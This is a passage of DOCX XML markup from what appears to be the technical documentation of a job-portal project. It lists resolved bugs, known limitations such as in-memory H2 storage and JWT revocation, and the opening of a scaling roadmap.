          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Unhandled 500 on Expired JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Expired token threw unhandled ServletException in filter chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JwtAuthenticationFilter lacked try-catch block around claims parser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH: 500 Internal Server Error returned instead of 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wrapped token parsing in try-catch; logs warning and continues filter chain cleanly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Strict Signup Validation Rejection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate signup failed with HTTP 400 Bad Request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SignupRequest had @NotBlank on optional mobileNumber &amp; confirmPassword.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MEDIUM: Blocked valid candidate onboarding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Relaxed non-essential validation annotations on auxiliary fields.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter Analytics Field Mismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter KPI cards showed 0 or NaN.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AnalyticsService returned snake_case active_jobs; frontend expected camelCase activeJobs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MEDIUM: Dashboard telemetry cards broke.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Added camelCase alias keys to the analytics response Map.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Duplicate JobCard Root File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vite build warned about duplicate JobCard.jsx in src/components/.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legacy JobCard.jsx collided with JobCard/JobCard.jsx component folder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LOW: Developer confusion &amp; lint warnings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Purged orphan root JobCard.jsx and standardized on component subfolder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>29. Current Project Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A senior engineer understands the architectural trade-offs of their current implementation:</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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Severity Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Technical Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Production Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>In-Memory Database State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2 database resets tables when JVM stops, requiring DataInitializer re-seeding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Switch to AWS RDS MySQL 8.0 with Flyway automated migrations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stateless JWT Revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JWTs remain valid until 24-hour expiration; logging out cannot revoke tokens on other devices.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implement a distributed token blacklist in Redis with TTL matching token expiry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Synchronous Polling Notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Notifications are fetched on page load rather than pushed in real-time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Integrate Spring WebSocket (STOMP) or Server-Sent Events (SSE) for push notifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Local Document Simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Resumes are stored as text URLs rather than binary byte arrays.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implement direct multipart file upload to Amazon S3 with signed pre-authenticated URLs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>30. Improvement Roadmap &amp; Scalability Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A four-phase engineering roadmap for scaling GlobalCo to 1,000,000 active concurrent users:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Phase 1: Persistent Database &amp; Connection Pooling — Migrate H2 to Amazon Aurora MySQL with HikariCP pool tuned to 50 max connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Phase 2: Distributed Caching with Redis — Add Redis cache (@Cacheable) for read-heavy endpoints like GET /api/jobs and GET /api/categories, reducing database read load by 85%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
